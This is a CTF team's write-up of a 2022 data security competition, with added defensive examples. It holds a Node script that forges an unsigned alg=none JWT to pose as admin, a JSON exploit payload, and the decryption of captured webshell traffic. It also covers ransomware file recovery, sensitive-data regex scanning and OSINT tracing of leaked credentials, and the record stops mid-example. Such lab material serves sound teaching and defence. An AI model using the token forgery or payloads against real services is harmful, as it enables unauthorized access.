2022 Data Security CTF write-up
Team name: 青春猪头thai会梦见无敌暴龙美少女战士/T249305
Team ranking: 98 (final: 77)
Overall team result: 48 challenges solved
Data Security track
Survey
Fill in the survey; the flag is at the end.
easy_node
Solver: 清纯柱头台
Going by the challenge's intended path, you first log in as admin and can then use copyarray; intuitively, copyarray's recursion is where a hole could be. The problem is the login.
While debugging I found this:
const token = jwt.sign({username}, secret, {algorithm: 'HS256'});
algorithm should have been algorithms; the option is misused here, so the algorithm never actually gets stored.
So forge the cookie with the algorithm set to none. The script was found online:
const jwt = require('jsonwebtoken');
// Payload that impersonates the admin account
const payload = {
    username: 'admin'
};
// With no secret and algorithm 'none', jsonwebtoken emits an unsigned token
// (header alg "none", empty signature segment)
const token = jwt.sign(payload, undefined, {algorithm: 'none'});
console.log(token);
After that it is fairly routine:
{"properties":[{"0":"flag","length":1}]}
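Whatever the exact server-side cause, the defence against an alg-none token is the same: the verifier pins the algorithms it accepts and never lets the token header choose one. The following stand-alone verifier is an added example for this write-up, not code from the challenge; it uses only the Python standard library, and the helper names (jwt_sign_hs256, unsigned_token, jwt_verify, accepts) and the secret are constructed for the example. unsigned_token only reproduces the shape of the token the script above prints, so that the verifier can be shown rejecting it.

```python
import base64
import hashlib
import hmac
import json

# Only the algorithm the application actually signs with is accepted.
ALLOWED_ALGS = {"HS256"}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def jwt_sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a normal HS256 token (what the application should be doing)."""
    signing_input = _segment({"alg": "HS256", "typ": "JWT"}) + "." + _segment(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def unsigned_token(payload: dict) -> str:
    """Shape of the token produced by the script above: header alg 'none' and an
    empty signature segment. Used here only as a test input for the verifier."""
    return _segment({"alg": "none", "typ": "JWT"}) + "." + _segment(payload) + "."


def jwt_verify(token: str, secret: bytes) -> dict:
    """Strict verification: the header's alg must be in the allowlist and the
    HMAC must match. The header is never trusted to select the algorithm."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    if header.get("alg") not in ALLOWED_ALGS:
        raise ValueError("algorithm %r not allowed" % header.get("alg"))
    expected = hmac.new(secret, (h + "." + p).encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def accepts(token: str, secret: bytes) -> bool:
    """True only for a token that passes jwt_verify."""
    try:
        jwt_verify(token, secret)
        return True
    except ValueError:  # covers JSON and base64 errors too (both subclass ValueError)
        return False


if __name__ == "__main__":
    secret = b"constructed-secret"
    good = jwt_sign_hs256({"username": "guest"}, secret)
    print("signed token accepted:", accepts(good, secret))
    print("alg=none token accepted:", accepts(unsigned_token({"username": "admin"}), secret))
```

The allowlist check runs before any signature work, so an alg of none (or a swap to another algorithm family) is rejected without ever consulting the signature segment.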
Ransomware file recovery
Solver: 清纯柱头台
from Crypto.Util.number import bytes_to_long, long_to_bytes
import base64
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES
from gmpy2 import invert

# Factors of the 256-bit modulus that wraps the user's RSA private key
p = 272996653310673477252411125948039410213
q = 272996653310673477252411125948039410333
encrypted_aes_key = base64.b64decode('hNjALvjhXUT4Uk6pMmC30o4hhhFDhtbPQzhYzUl+bsWjDHer2fvCTQKGJ2hmEb4TDWx2s0huNPCSO46vo2BVUw==')
encrypted_private_key = base64.b64decode('...')  # base64 ciphertext omitted on the page
n = p * q
e = 65537
d = invert(e, (p - 1) * (q - 1))

# 1) Recover the PEM private key: 32-byte RSA blocks with PKCS#1 v1.5 padding
prikey_pkcs = ''
for i in range(0, len(encrypted_private_key), 32):
    c = bytes_to_long(encrypted_private_key[i:i + 32])
    m = pow(c, d, n)
    plain_ = long_to_bytes(m)
    # long_to_bytes drops the leading 0x00, so scan back to the 0x00 separator
    # and keep everything after it (the data bytes)
    for j in range(len(plain_) - 1, 0, -1):
        if plain_[j] == 0:
            prikey_pkcs += plain_[j + 1:].decode()
            break
print(prikey_pkcs)
private_key = RSA.import_key(prikey_pkcs)
uid_d = private_key.d
uid_n = private_key.n

# 2) Unwrap the AES key with the recovered private key: 16-byte RSA blocks
aes_key = b''
for i in range(0, len(encrypted_aes_key), 16):
    c = bytes_to_long(encrypted_aes_key[i:i + 16])
    m = pow(c, uid_d, uid_n)
    plain_ = long_to_bytes(m)
    for j in range(len(plain_) - 1, 0, -1):
        if plain_[j] == 0:
            aes_key += plain_[j + 1:]
            break

# 3) The locked file is AES-CBC with the key reused as the IV
cipher = AES.new(aes_key, AES.MODE_CBC, aes_key)
with open("flag.mp3.locked", 'rb') as f:
    cccc = f.read()
res = cipher.decrypt(cccc)
with open("flag.mp3", "wb") as fo:
    fo.write(res)
The result is an audio file; listen to it for the flag.
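The recovery above is possible because the two primes in the script differ by only 120, so n = p*q yields to Fermat's factoring method in one step; a ransomware author who generates keys this way has effectively published the private key. The block below is an added example, not part of the write-up or the challenge: it factors the script's modulus with Fermat's method, then shows the PKCS#1 v1.5 padding round trip that the script strips by hand, using only the standard library. The message, the pad/unpad helpers and the function names are constructed for the example; unlike long_to_bytes, the decrypt helper keeps the block at its full length so the 0x00/0x02 header can be checked instead of guessed.

```python
import math
import secrets

# Primes copied from the recovery script above
P = 272996653310673477252411125948039410213
Q = 272996653310673477252411125948039410333
E = 65537


def fermat_factor(n, max_iter=10_000):
    """Recover (p, q) of n = p*q when |p - q| is small. Starting at a = ceil(sqrt(n)),
    a*a - n becomes a perfect square b*b as soon as a = (p+q)/2; then p, q = a -/+ b.
    Returns None when no factor is found within max_iter steps (healthy keys)."""
    a = math.isqrt(n)
    if a * a < n:
        a += 1
    for _ in range(max_iter):
        b2 = a * a - n
        b = math.isqrt(b2)
        if b * b == b2:
            return a - b, a + b
        a += 1
    return None


def pkcs1_v15_pad(msg, k):
    """PKCS#1 v1.5 type 2 block: 00 02 <at least 8 non-zero random bytes> 00 <msg>."""
    if len(msg) > k - 11:
        raise ValueError("message too long for modulus")
    ps = bytes(secrets.choice(range(1, 256)) for _ in range(k - len(msg) - 3))
    return b"\x00\x02" + ps + b"\x00" + msg


def pkcs1_v15_unpad(block):
    """Strip type 2 padding, rejecting malformed blocks instead of guessing."""
    if len(block) < 11 or block[0] != 0 or block[1] != 2:
        raise ValueError("bad padding header")
    sep = block.find(b"\x00", 2)
    if sep < 10:  # fewer than 8 padding bytes, or no separator at all
        raise ValueError("padding separator missing or too early")
    return block[sep + 1:]


def rsa_encrypt_block(msg, n, e):
    k = (n.bit_length() + 7) // 8  # 32 for the modulus above
    m = int.from_bytes(pkcs1_v15_pad(msg, k), "big")
    return pow(m, e, n).to_bytes(k, "big")


def rsa_decrypt_block(ct, n, d):
    k = (n.bit_length() + 7) // 8
    m = pow(int.from_bytes(ct, "big"), d, n)
    return pkcs1_v15_unpad(m.to_bytes(k, "big"))  # keep the leading 0x00


def recover_and_decrypt(n, e, ct):
    """What the attacker's weak key generation gives away: factor n, rebuild d, decrypt."""
    factors = fermat_factor(n)
    if factors is None:
        raise ValueError("modulus did not factor; primes are not close")
    p, q = factors
    d = pow(e, -1, (p - 1) * (q - 1))
    return rsa_decrypt_block(ct, n, d)


if __name__ == "__main__":
    n = P * Q
    print("factors:", fermat_factor(n) == (P, Q))
    ct = rsa_encrypt_block(b"sample-aes-key!!", n, E)   # constructed 16-byte message
    print("recovered:", recover_and_decrypt(n, E, ct))
```

fermat_factor doubles as a cheap sanity check on any RSA modulus you generate or receive: if it returns within a handful of iterations, the key is unusable.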
Data algorithm challenge
Solver: 清纯柱头台
First, match every possible format according to the requirements in the task file:
import re

# ---- Luhn algorithm: checksum of a complete number; 0 means the number is valid ----
def luhn_checksum(card_number):
    def digits_of(n):
        return [int(d) for d in str(n)]
    digits = digits_of(card_number)
    odd_digits = digits[-1::-2]
    even_digits = digits[-2::-2]
    checksum = 0
    checksum += sum(odd_digits)
    for d in even_digits:
        d_0 = 2 * d
        d_1 = d_0 // 10
        d_2 = d_0 % 10
        checksum += d_1
        checksum += d_2
    return checksum % 10

# ---- matching helper: every occurrence of head followed by tail in text ----
def f(head, tail, text):
    ans = []
    reses = re.findall("(" + head + tail + ")", text)
    for res in reses:
        ans.append(res[0])   # group 0 is the whole head+tail match
    return ans

ff = open("result.txt", "a")
ff.write("Now the file has more content!\n")

#### phone ####
texts = open('./sens_data.txt', 'r').readlines()
heads = open('./phone_head.txt', 'r').readlines()
tail = r"([\-|\s])(\d)(\d)(\d)(\d)([\-]|[\s])(\d)(\d)(\d)(\d)"
for ii in range(len(texts)):
    text = texts[ii]
    for head in heads:
        ans = f(r"\s" + head.strip(), tail, text)
        for i in ans:
            print(ii + 1, "PhoneNo", i[1:])   # i[1:] drops the leading whitespace
            ff.write(str(ii + 1) + ",PhoneNo," + str(i[1:]))
            ff.write("\n")

######### IMEI #####
texts = open('./sens_data.txt', 'r').readlines()
heads = open('./IMEI_head.txt', 'r').readlines()
tail = r"(\d)(\d)(\d)(\d)(\d)(\d)(\d)(\d)(\d)(\d)(\d)(\d)(\d)"
for ii in range(len(texts)):
    text = texts[ii]
    for head in heads:
        ans = f(r"\s" + head.strip(), tail, text)
        for i in ans:
            # Luhn over the full 15-digit IMEI (the last digit is the check digit):
            # a valid number has checksum 0. The original compared
            # luhn_checksum(i[1:-1]) with int(i[-1]), which is not the Luhn relation.
            if luhn_checksum(i[1:]) == 0:
                print(ii + 1, "IMEI", i[1:])
                ff.write(str(ii + 1) + ",IMEI," + str(i[1:]))
                ff.write("\n")

##### bankcard #####
texts = open('./sens_data.txt', 'r').readlines()
heads = open('./bankcard_head.txt', 'r').readlines()
tail = r"(\d{10,16})"
for ii in range(len(texts)):
    text = texts[ii]
    for head in heads:
        ans = f(r"\s" + head.strip(), tail, text)
        for i in ans:
            # if luhn_checksum(i[1:-1]) == int(i[-1]):
            #     print(i[1:])
            print(ii + 1, "BankCard", i[1:])
            ff.write(str(ii + 1) + ",BankCard," + str(i[1:]))
            ff.write("\n")

#### ipv4 ####
head = r"(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)"
texts = open('./sens_data.txt', 'r').readlines()
for ii in range(len(texts)):
    text = texts[ii]
    ans = f(head, '', text)
    for i in ans:
        print(ii + 1, "IPv4", i[0:])
        ff.write(str(ii + 1) + ",IPv4," + str(i[0:]))
        ff.write("\n")

######## Email ####
head = r"\w[-\w.+]*@([A-Za-z0-9][-A-Za-z0-9]+\.)+[A-Za-z]{2,14}"
texts = open('./sens_data.txt', 'r').readlines()   # the original assigned this to `text`
for ii in range(len(texts)):
    text = texts[ii]
    ans = f(head, '', text)
    for i in ans:
        print(ii + 1, "Email", i[0:])
        ff.write(str(ii + 1) + ",Email," + str(i[0:]))
        ff.write("\n")
ff.close()
exit()
Alternatively, run each section separately and concatenate the outputs, then tidy the format (strip trailing newlines and so on).
Submitting this scored only 590+.
Then I noticed that some bank card formats had not been matched.
I wrote a script to match the remaining bank cards:
import re

def luhn_checksum(card_number):   # same helper as above; kept from the original, unused here
    def digits_of(n):
        return [int(d) for d in str(n)]
    digits = digits_of(card_number)
    odd_digits = digits[-1::-2]
    even_digits = digits[-2::-2]
    checksum = 0
    checksum += sum(odd_digits)
    for d in even_digits:
        d_0 = 2 * d
        d_1 = d_0 // 10
        d_2 = d_0 % 10
        checksum += d_1
        checksum += d_2
    return checksum % 10

# Run every pattern. The original assigned them one at a time to `patten` and
# re-ran the script for each; iterating over all three is equivalent.
PATTERNS = [
    r"[Bb]ank[Nn]o.*(\d{4}[- ]\d{4}[- ]\d{4}[- ]\d{1,6})",
    r"cardNo.*(\d{4}[- ]\d{4}[- ]\d{4}[- ]\d{1,6})",
    r"[Cc]ard&.*(\d{4}[- ]\d{4}[- ]\d{4}[- ]\d{1,6})",
]

def f(text):
    ans = []
    for patten in PATTERNS:
        reses = re.findall(patten, text)   # one group, so findall yields the card numbers
        # print(reses)
        for res in reses:
            ans.append(res)
    return ans

ff = open("bank.txt", "a")
texts = open('./sens_data.txt', 'r').readlines()
for ii in range(len(texts)):
    text = texts[ii]
    ans = f(text)
    # print(ans)
    for i in ans:
        # i is the card number itself (the original's print(i[1:]) dropped its first digit)
        print(ii + 1, "BankCard", i)
        ff.write(str(ii + 1) + ",BankCard," + str(i))
        ff.write("\n")
ff.close()
Appending those results to the earlier result.txt brought the score to 648.
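The two scripts above amount to a small DLP scanner: regex candidates per data type, a Luhn check to drop digit runs that merely look like a card or IMEI, and a CSV of (line, type, value). The block below is an added example written for this write-up, not the challenge's code: it rolls the same approach into one pass, with a correct Luhn validator applied to both IMEIs and card numbers, patterns that use digit boundaries instead of the prefix files the write-up used (phone_head.txt and so on are not reproduced here), and constructed sample lines in place of sens_data.txt. Function names and the sample data are assumptions of this example.

```python
import re

# Detection patterns (constructed for this example). Lookarounds stop a match
# from starting or ending in the middle of a longer digit run.
PATTERNS = {
    "PhoneNo": re.compile(r"(?<!\d)1[3-9]\d{9}(?!\d)"),          # CN mobile: 11 digits
    "IMEI": re.compile(r"(?<!\d)\d{15}(?!\d)"),                   # 14 digits + Luhn check digit
    "BankCard": re.compile(r"(?<!\d)\d{4}(?:[- ]?\d{4}){2}[- ]?\d{4}(?:[- ]?\d{1,3})?(?!\d)"),  # 16-19 digits
    "IPv4": re.compile(r"(?<![\d.])(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}"
                       r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(?![\d.])"),
    "Email": re.compile(r"[\w.+-]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,14}"),
}

# Types whose last digit is a Luhn check digit; a failed check means "not a real one"
LUHN_CHECKED = {"IMEI", "BankCard"}


def luhn_valid(number: str) -> bool:
    """Standard Luhn: double every second digit from the right, subtract 9 if > 9,
    and require the total to be divisible by 10. Separators are ignored."""
    digits = [int(c) for c in number if c.isdigit()]
    total = 0
    for pos, d in enumerate(reversed(digits)):
        if pos % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan(lines):
    """Return [(line_no, type, value)] for every validated hit, in file order."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for kind, pattern in PATTERNS.items():
            for m in pattern.finditer(line):
                value = m.group(0)
                if kind in LUHN_CHECKED and not luhn_valid(value):
                    continue   # right shape, wrong check digit: skip it
                hits.append((lineno, kind, value))
    return hits


def to_csv(hits):
    """Same "line,Type,value" layout the write-up submitted."""
    return "\n".join(f"{n},{kind},{value}" for n, kind, value in hits)


# Constructed sample input standing in for sens_data.txt. The card and IMEI on
# lines 3 and 2 are the well-known Luhn test values; line 4 holds look-alikes
# whose check digits are wrong.
SAMPLE_LINES = [
    "user=zhangqiang phone=18798766766 city=广州",
    "device imei=490154203237518 ip=192.168.13.1",
    "refund cardNo 4539-1488-0343-6467 contact liuxiao@example.com",
    "bogus imei=490154203237519 card 1234 5678 9012 3456",
]

if __name__ == "__main__":
    print(to_csv(scan(SAMPLE_LINES)))
```

Separating candidate matching from validation is what keeps the false-positive rate down: the 16-digit run on the last sample line is rejected by the check digit rather than reported as a card.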
Data analysis challenge
Leak tracing and localization
Solver: 刘积良
1
Open the capture in Wireshark and filter with mysql to get the MySQL packets; then
the third user to log in can be seen to be dataUser3.
2
Looking into dataUser3's access data turned up nothing.
According to the hint in the challenge document:
The company once uploaded part of its code to GitHub and Yuque; the account is suspected to have leaked there.
Register an account on Yuque and search for dataUser3 in the personal-space search box.
Copy the code found there and search for it on GitHub.
Open the result and copy the link:
https://github.com/Tristan-Hao/Green-Berry/blob/f766064e4f9c38bf4aefa06fd3d4abbda7fe4914/catalogue.py
Replace f766064e4f9c38bf4aefa06fd3d4abbda7fe4914
with main
and submit.
3
From dataUser3's access statements, determine what data it obtained.
dataUser1
张强 18798766766广州
王小明 13345678879北京市昌平区
13573839493 15877886543 13098887678 18798766766
地址:浙江省杭州市拜节新村97号
dataUser2
黄天 河北省石家庄
Roberto Qian Beijing
Liu Xiao 13098887678 北京市昌平区
收款人帐号:621700323000106****
dataUser3
王小明 13345678879 北京市昌平区
黄天 13573839493 河北省石家庄
Roberto Qian 15877886543 Beijing
Liu Xiao 13098887678 北京市昌平区
张强 18798766766 广州
And also what dataUser3 obtained:
## select * from dcf_encryption_info
1 Base64
2 MD5
3 SHA1 go321
4 AES aa01
5 AES sin30
## select * from dcf_receive_info3
a....1.10021X
U2FsdGVkX18ONrEC8DOa5sxdTazAeWPXK8OP/885ZQJWJf6P4RsZUfl8o1VOczurimp/uoUa4NuWVb7f7yTcRw==
.....2.10024.
U2FsdGVkX18DnWH7nMCG3lVMd8GtLTXeuwEl7xgojnkN2Ovsm0rXzNqLEI0RSnwPYN+/p9BG4ODOr4Iwczj2A3nMwuZkzzTE8z88f/6gGzjhhbdA52JK3f1pivFbnSt+
u....3.10022l
U2FsdGVkX1+/NGJAqRBlFe+GyjneDvQ8ncbqP+ra5DXk1XGLuGXMbf7TLC5NSScurrJuB2mOxXHJh0yeNiW3vXC+/iKbXQoQhphVQJkUiX0=
u....4.11021l
U2FsdGVkX18X1/E8qwRNMB9ON1Z+fKLmmkhuVa0EoCRSnppuybeWlcho8XWURJhD0hS1TqBLLH/gAW3lqAGO5BTn9vjUCEQiY7ydcWGPBSs=
... .5.15021.
U2FsdGVkX19Gqh30S0qbTTKMw+mXBg2H+FsngqcZNr+KmWQnpVNLDtpPqt5eX7/hFEIbGXxOrJ9VUX3tBJZkR0RYL+TQHV6QHoYvQweOFLRY/PcpP5D2NoqZMLT6hwrz
u...6.15021l
U2FsdGVkX1+bn0csCcNtspL662QhJQI/NEsj8fWWyIBU0GVXvvc/ygymTqH3x8LFcyvPV4YE7OtxkRXOS90Ox49TI/StAcIdnQBletRVA2g=
a....7.15021X
U2FsdGVkX1+2aHxIB+0HcAPn7x370Dv5RxN2LSlrmkqbNa8bpEfapNqyxWXFWtJvS3d6vfVNpgN6pFzpnDiELA==
a....8.11021X
U2FsdGVkX18Oj2t+msNrJ7T0sXpcrW0Usy1yqQYRoJF1JQwnD/thdJpPKZ1xTVtrgo8y6LQn5yMMzf6nR6vNiw==
a...9.15022X
U2FsdGVkX1+93npTkiALajdkWz5i4ccX2nV0mRQGfKQUcEOo0YpGBKSm21ayhT0wq7t7vypmpqqLemWjQN5z4Q==
b....10.16025X
U2FsdGVkX19uDaaDF/0X1yvPtZHqG1jG2Fw0bDQM+jqLoN19RE5MOdiQNVI0k150G+ZB3Ow+8pDvwIw9hdT8wQ==
b....11.15028X
U2FsdGVkX1/GrEF+qSfy8Fq+w8O0t7ABU1OqzrCoCFo+i42H03T9q2EjSKkSGSPh3gDfBHfamAJwf1OR0WprGw==
b....12.15026X
U2FsdGVkX19AUOJfLgsTjgV5N/ywPP0vvv52phIYEjxdX70aOG8ek8D55IPDYa7Bz05BmmFE89CVgMDIt1Y7zg==
J....13.15771@
U2FsdGVkX19V7mz6otuRIdXKP/0pG1DXBl7LwM8Ng28m0Om9wlGsBDUynwm4Hhfl
J....14.15231@
U2FsdGVkX19PJjvCZ4dPBUzWF0A0ZrRQf5C7bYAbC2DUBEggsjIWflpsUkgeFQOK
J....15.15451@
U2FsdGVkX18li8mlOIWPfxl331OPPIE64pywNqWvq88P0ZJSU7WMO2ZyDNxxD/on
J....16.15091@
U2FsdGVkX19yVfbektz9sPOmf64arS54qTNOQI4qH1A0AGNPMtw1kGaJ2zMx7MDl
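Every value in the dcf_receive_info3 dump begins with U2FsdGVkX1, which is the base64 encoding of the 8-byte header Salted__ used by OpenSSL's enc and by CryptoJS: magic, then an 8-byte salt, then the ciphertext, with key and IV derived from a passphrase and that salt rather than stored. Recognising the container is the first triage step when an encrypted column turns up in a leak; the block below is an added example for this write-up, not the challenge's code, using only the standard library. The first two blobs are copied from the dump above; the malformed one is the first blob with its padding cut off, constructed to show the error path, and the function name is an assumption of the example.

```python
import base64
import binascii

OPENSSL_MAGIC = b"Salted__"   # base64 "U2FsdGVkX1..." always decodes to this prefix

# Rows copied from the dcf_receive_info3 dump above
SAMPLE_BLOBS = [
    "U2FsdGVkX18ONrEC8DOa5sxdTazAeWPXK8OP/885ZQJWJf6P4RsZUfl8o1VOczurimp/uoUa4NuWVb7f7yTcRw==",
    "U2FsdGVkX19V7mz6otuRIdXKP/0pG1DXBl7LwM8Ng28m0Om9wlGsBDUynwm4Hhfl",
]
# Constructed: the first blob with its last three characters removed
MALFORMED_BLOB = SAMPLE_BLOBS[0][:-3]


def triage_blob(b64text: str) -> dict:
    """Classify one stored value without attempting to decrypt it.

    openssl-salted : "Salted__" + 8-byte salt + ciphertext (key/IV derived from a passphrase)
    malformed-base64: not decodable as strict base64 (truncated or corrupted row)
    other          : decodable, but not this container
    """
    try:
        raw = base64.b64decode(b64text, validate=True)
    except (binascii.Error, ValueError):
        return {"format": "malformed-base64", "length": len(b64text)}
    if raw.startswith(OPENSSL_MAGIC) and len(raw) >= 16:
        salt, body = raw[8:16], raw[16:]
        return {
            "format": "openssl-salted",
            "salt": salt.hex(),
            "ciphertext_len": len(body),
            # AES-CBC output is a whole number of 16-byte blocks
            "block_aligned": len(body) % 16 == 0,
        }
    return {"format": "other", "length": len(raw)}


def triage_column(values):
    """Summarise a whole column: how many rows fall into each format."""
    summary = {}
    for v in values:
        fmt = triage_blob(v)["format"]
        summary[fmt] = summary.get(fmt, 0) + 1
    return summary


if __name__ == "__main__":
    for blob in SAMPLE_BLOBS + [MALFORMED_BLOB]:
        print(triage_blob(blob))
    print(triage_column(SAMPLE_BLOBS + [MALFORMED_BLOB]))
```

A per-row salt means two rows holding the same plaintext still produce different ciphertext, so equal-ciphertext matching will not help; the block alignment, on the other hand, confirms a block cipher in CBC (or ECB) mode rather than a stream mode.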
SQLpacket
Solver: 曹国航
Export objects, HTTP objects.
shell.php and the operation that writes the webshell are visible.
The transport encryption scheme is also visible.
Write the decryption script (decrypting directly had problems for reasons I don't know, so there is a correction):
import base64
from Crypto.Cipher import AES

def decrypt(post):
    key = b'05c1cc9c2deafb75'
    post = base64.b64decode(post)
    # post = list(post)
    # for i, v in enumerate(post):
    #     post[i] = v ^ key[(i + 1) & 15]
    # post = bytes(post)
    # AES.new(key, MODE_CBC) with no iv picks a random IV, so in a plain CBC
    # decryption only the first block comes out wrong: block i >= 1 is
    # D(C_i) XOR C_{i-1} and does not depend on the IV. Taking block 0 from an
    # ECB decryption gives D(C_0), i.e. the CBC result for an all-zero IV.
    aes1 = AES.new(key, AES.MODE_CBC)
    aes2 = AES.new(key, AES.MODE_ECB)
    part1, part2 = aes1.decrypt(post), aes2.decrypt(post)
    post = part2[:16] + part1[16:]
    return post

print(decrypt('GBry5TfOces2H41Rjd+Gkmso9QPVLUsIsqV+CkcVIos/1/p2zZBgq6EuLkyMLZOF'))
1
5
Decoding and analysis shows these are mainly interactive scripts; the responses are JSON results.
Extract with tshark:
tshark -r sql.pcapng -e tcp.stream -e http.file_data -Tfields 'tcp.stream >= 190' > rst.txt
Then parse with a script:
import base64
import json
# decrypt() is the function from the decryption script above

with open('rst.txt', 'r') as f:
    data = f.read().splitlines()
with open('rrrst.txt', 'w') as f:
    for d in data:
        d = d.split()
        if len(d) != 2:        # expect "<tcp.stream> <http.file_data>"
            continue
        idx, post = d
        try:
            post = decrypt(post)
        except Exception:      # not base64 / not a whole number of blocks
            continue
        # startidx = post.find(b'base64_decode(\'') + 15
        print(idx, post.decode(errors='replace'), file=f)
        if b'msg' in post:
            # response body: a JSON object whose msg field is base64
            idx = post.find(b'}')
            js = json.loads(post[:idx + 1])
            print(base64.b64decode(js['msg']).decode(errors='replace'), file=f)
        # b = post[startidx:post.find(b'\'));')]
        # print(b)
        # s = base64.b64decode(b)
        # print(s.decode())
The following information can be found in the results:
mysql666123.c
2
While writing the reverse script I found that tcp.stream eq 197 had content that could not be parsed; copying it out and parsing it separately
gives the value of secret1.
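The "correction" in the decryption script above works for a reason worth seeing explicitly: in CBC, plaintext block i is D(C_i) XOR C_{i-1}, so every block except the first decrypts correctly whatever IV you pass, and taking block 0 from ECB is exactly CBC under an all-zero IV. The block below is an added example for this write-up, not the challenge's code. It stands in a seeded byte-substitution for AES (labelled as a toy, so that it runs with the standard library alone), implements CBC/ECB over it, reproduces the splice trick, and reuses the parsing script's JSON-plus-base64 extraction on a constructed response body. All names and sample data are constructed for the example.

```python
import base64
import json
import os
import random

BLOCK = 16


def make_toy_block_cipher(seed=1):
    """Stand-in for AES in this example (NOT a real cipher): a keyed byte
    substitution applied to each byte of a block. It supplies the only property
    the CBC argument needs, an invertible permutation of 16-byte blocks."""
    table = list(range(256))
    random.Random(seed).shuffle(table)
    inverse = [0] * 256
    for plain, enc_byte in enumerate(table):
        inverse[enc_byte] = plain
    return (lambda blk: bytes(table[b] for b in blk),
            lambda blk: bytes(inverse[b] for b in blk))


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def cbc_encrypt(enc, iv, pt):
    out, prev = [], iv
    for blk in blocks(pt):
        prev = enc(xor(blk, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(dec, iv, ct):
    out, prev = [], iv
    for blk in blocks(ct):
        out.append(xor(dec(blk), prev))   # P_i = D(C_i) XOR C_{i-1}; only P_0 uses the IV
        prev = blk
    return b"".join(out)


def ecb_decrypt(dec, ct):
    return b"".join(dec(blk) for blk in blocks(ct))


def splice_decrypt(dec, ct):
    """The write-up's correction: block 0 from ECB, the rest from CBC under an
    arbitrary (here random) IV. Equivalent to CBC with an all-zero IV."""
    part_cbc = cbc_decrypt(dec, os.urandom(BLOCK), ct)
    part_ecb = ecb_decrypt(dec, ct)
    return part_ecb[:BLOCK] + part_cbc[BLOCK:]


def extract_msg(post):
    """Mirror of the parsing script: JSON object up to the first '}', whose
    'msg' field is base64."""
    js = json.loads(post[:post.find(b"}") + 1])
    return base64.b64decode(js["msg"])


def demo():
    """Constructed exchange: a 48-byte response body sent under a zero IV,
    decrypted once with the wrong IV to show only block 0 is affected."""
    enc, dec = make_toy_block_cipher()
    pt = b'{"status":"ok","msg":"aGVsbG8gd29ybGQ="}'.ljust(3 * BLOCK, b" ")
    ct = cbc_encrypt(enc, bytes(BLOCK), pt)            # sender used an all-zero IV
    wrong_iv = cbc_decrypt(dec, b"\x11" * BLOCK, ct)   # receiver guessed the IV wrong
    return pt, ct, wrong_iv


if __name__ == "__main__":
    pt, ct, wrong_iv = demo()
    _, dec = make_toy_block_cipher()
    print("blocks 1..n intact with wrong IV:", wrong_iv[BLOCK:] == pt[BLOCK:])
    print("splice == zero-IV CBC:", splice_decrypt(dec, ct) == cbc_decrypt(dec, bytes(BLOCK), ct))
    print("msg:", extract_msg(splice_decrypt(dec, ct)))
```

For a real capture the same reasoning tells you what to try first when the IV is unknown: decrypt with any IV, and if blocks 1 onward are clean text the scheme is CBC and only the IV (often all zeros or the key itself, as in the other scripts on this page) remains to be determined.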
Account and password leak tracking
Solver: 曹国航
1
Searching GitHub for green berry finds the project: https://github.com/Tristan-Hao/Green-Berry
Looking through the commits reveals the key:
Answer: https://github.com/Tristan-Hao/Green-Berry/blob/main/scrubbers.py
2
Searching Gitee for qingmei finds the project: https://gitee.com/datasecurity-qunzhong/qing-mei-login
Likewise, the answer: https://gitee.com/datasecurity-qunzhong/qing-mei-login/blob/master/scrubbers.py
3
Searching Yuque for 青莓 后台 gives https://www.yuque.com/shuanxiaoming/gsx1eb/efnpu3
4
Searching Zhihu for 青莓 后台 gives https://zhuanlan.zhihu.com/p/521587651
5
Searching CSDN for 青莓 后台 gives https://blog.csdn.net/haoxin1983/article/details/125905827
BlueTeam
Solver: 曹国航
1
Looking at the Security event log, there are traces of logons by multiple users:
newguest
link3
ming
tony
Guest
Adminnistrator
NewGuest
strike
miao
Then I noticed that the ming account appears to have been brute-forced many times, with failed logons.
Submitting Ming succeeded.
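The observation that led to the answer (many failed logons against one account) is the classic brute-force signal in the Windows Security log, where event 4625 is a failed logon and 4624 a successful one. The block below is an added example for this write-up, not part of it: it runs that detection over constructed records shaped like an exported Security log (the account names echo the list above; timestamps and the 192.168.13.x source addresses are made up), flagging accounts with a burst of failures inside a time window and noting whether a success followed, which is what separates a noisy guess from a likely compromise. Field names follow the Security log's TargetUserName/IpAddress, but the record layout and function names are assumptions of this example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records in the shape of a Security-log export; not the challenge's log.
SAMPLE_EVENTS = [
    {"TimeCreated": "2022-05-20T08:00:00", "EventID": 4624, "TargetUserName": "tony",  "IpAddress": "192.168.13.5"},
    {"TimeCreated": "2022-05-20T08:01:00", "EventID": 4625, "TargetUserName": "ming",  "IpAddress": "192.168.13.9"},
    {"TimeCreated": "2022-05-20T08:01:10", "EventID": 4625, "TargetUserName": "ming",  "IpAddress": "192.168.13.9"},
    {"TimeCreated": "2022-05-20T08:01:20", "EventID": 4625, "TargetUserName": "ming",  "IpAddress": "192.168.13.9"},
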